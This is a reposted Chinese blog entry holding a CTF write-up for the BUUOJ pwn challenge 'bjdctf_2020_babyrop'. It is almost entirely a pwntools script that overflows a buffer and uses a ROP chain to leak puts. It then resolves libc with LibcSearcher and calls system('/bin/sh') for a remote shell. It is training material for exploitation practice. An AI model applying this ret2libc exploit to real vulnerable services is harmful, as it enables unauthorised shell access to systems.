zoukankan      html  css  js  c++  java

  • bjdctf_2020_babyrop

    找不到libc文件  用LibcSearcher模块

    from pwn import *
from LibcSearcher import *

context.log_level='debug'
r=remote('node3.buuoj.cn',28426)
#r=process('./bjdctf_2020_babyrop')
elf=ELF('./bjdctf_2020_babyrop')
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
main_addr=elf.symbols['main']
pop_rdi=0x0000000000400733


payload='a'*0x20+'b'*0x8
payload+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
r.recvuntil('Pull up your sword and tell me u story!')
r.sendline(payload)
r.recv()

puts_addr=u64(r.recv(6).ljust(8,'x00'))
libc=LibcSearcher('puts',puts_addr)
libc_base=puts_addr-libc.dump('puts')
system_addr=libc_base+libc.dump('system')
bin_addr=libc_base+libc.dump('str_bin_sh')

payload='a'*0x20+'b'*0x8
payload+=p64(pop_rdi)+p64(bin_addr)+p64(system_addr)
r.recvuntil('Pull up your sword and tell me u story!')
r.sendline(payload)

r.interactive()
  • 相关阅读:
    centos7系统初始化脚本
    git上传项目到github
    requests的使用
    zip函数
    mongodb基本操作
    mongodb的安装与配置启动(转)
    jupyter插件与主题
    map函数
    centos7 安装 ffmpeg
    centos7 下 yum 安装Nginx
  • 原文地址:https://www.cnblogs.com/gaonuoqi/p/12312777.html
Copyright © 2011-2022 走看看